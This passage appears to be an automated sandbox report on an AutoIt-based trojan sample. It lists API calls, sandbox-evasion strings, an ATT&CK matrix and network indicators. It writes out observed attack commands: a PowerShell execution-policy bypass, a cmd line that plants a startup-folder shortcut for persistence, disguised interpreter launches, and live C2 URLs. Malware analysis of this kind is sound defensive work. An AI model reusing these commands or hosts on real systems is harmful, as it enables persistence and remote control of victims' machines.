Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA4F8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19BC70
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19B7C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A71F4 FindFirstFileW,FindClose,0_2_00007FF7EC1A71F4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF7EC1A72A8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C94005
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C9494A
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9C2FF
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C9CD9F
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9CD14 FindFirstFileW,FindClose,6_2_00C9CD14
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F5D8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F735
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9FA36
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C93CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00654005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00654005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0065494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065CD14 FindFirstFileW,FindClose,11_2_0065CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0065CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00653CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00653CE2
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF7EC141D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.2132414313.000002366B563000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
Source: wscript.exe, 0000000A.00000002.2250642773.000001C85E0A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SwiftWrite.pif, 0000000B.00000002.3266574915.0000000003AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP^
Source: powershell.exe, 00000004.00000002.2097758108.00000236535C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HgfS6
Source: powershell.exe, 00000004.00000002.2132414313.000002366B595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U
Source: Guard.exe, 00000006.00000002.3266463703.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0A00 BlockInput,0_2_00007FF7EC1B0A00
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF7EC1237B0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC145BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF7EC145BC0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC126D1C LoadLibraryA,GetProcAddress,0_2_00007FF7EC126D1C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CDC4 GetProcessHeap,HeapAlloc,InitializeAcl,0_2_00007FF7EC18CDC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC15AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EC15AF58
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC168FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7EC168FE4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1459C8 SetUnhandledExceptionFilter,0_2_00007FF7EC1459C8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EC1457E4
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00C5A385
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5A354 SetUnhandledExceptionFilter,6_2_00C5A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061A354 SetUnhandledExceptionFilter,11_2_0061A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0061A385

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF7EC18CE68
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF7EC1237B0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF7EC144514
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B4C58 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00007FF7EC1B4C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC18C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF7EC18C5FC
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC18D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF7EC18D540
Source: cxZuGa.exe, SwiftWrite.pif.6.dr, Guard.exe.1.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cxZuGa.exe, Guard.exe, SwiftWrite.pif Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC15FD20 cpuid 0_2_00007FF7EC15FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC182BA0 GetLocalTime,0_2_00007FF7EC182BA0
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC182BCF GetUserNameW,0_2_00007FF7EC182BCF
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC162650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF7EC162650
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF7EC141D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: cxZuGa.exe, 00000000.00000003.2060153983.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000003.2060234816.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000003.2060251000.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000002.2060809307.0000017C03FEF000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000003.2060085372.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000006.00000002.3264835640.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2131489249.000002366B392000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2132414313.000002366B540000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2132414313.000002366B575000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2107810645.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2096909845.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2107909255.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2122385003.0000000004491000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2108017264.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2107517789.0000000004491000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2122300103.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2108181509.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Guard.exe
Source: cxZuGa.exe, 00000000.00000002.2060480429.0000017C03FC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2131489249.000002366B392000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2132414313.000002366B595000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2131489249.000002366B31D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000006.00000002.3264333376.00000000009CE000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2132414313.000002366B595000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "C:\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: cxZuGa.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: Guard.exe.1.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF7EC1B4074
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF7EC1B3940
Source: C:\Users\Public\Guard.exe Code function: 6_2_00CA696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00CA696E
Source: C:\Users\Public\Guard.exe Code function: 6_2_00CA6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00CA6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0066696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0066696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_00666E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00666E32
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
2
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
12
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS26
System Information Discovery
Distributed Component Object ModelInput Capture22
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
311
Masquerading
LSA Secrets41
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
[Behavior graph] ID: 1583285, Sample: cxZuGa.exe, Start date: 02/01/2025, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
cxZuGa.exe | 45% | ReversingLabs | Win64.Trojan.AutoitInject
cxZuGa.exe | 61% | Virustotal |
Source | Detection | Scanner | Label
C:\Users\Public\Guard.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://crl.microsoftH | 0% | Avira URL Cloud | safe
http://139.99.188.124/kYCQj.txt | 0% | Avira URL Cloud | safe
http://139.99.H2. | 0% | Avira URL Cloud | safe
http://139.99.188.124/TSKUVpnJ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://139.99.188.124/TSKUVpnJ | true | Avira URL Cloud: safe | unknown
http://139.99.188.124/kYCQj.txt | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | Guard.exe, 00000006.00000002.3264677363.0000000000CF9000.00000002.00000001.01000000.00000007.sdmp, Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000000B.00000002.3264616200.00000000006B9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.dr | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoftH | powershell.exe, 00000004.00000002.2097448709.0000023651695000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://139.99.188.124 | powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://139.99.H2. | powershell.exe, 00000004.00000002.2097758108.00000236544AB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
139.99.188.124 | unknown | Canada | 16276 | OVHFR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583285
Start date and time: 2025-01-02 10:54:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cxZuGa.exe
Detection: MAL
Classification: mal100.expl.evad.winEXE@15/12@2/1
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 48
• Number of non-executed functions: 243
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 940 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
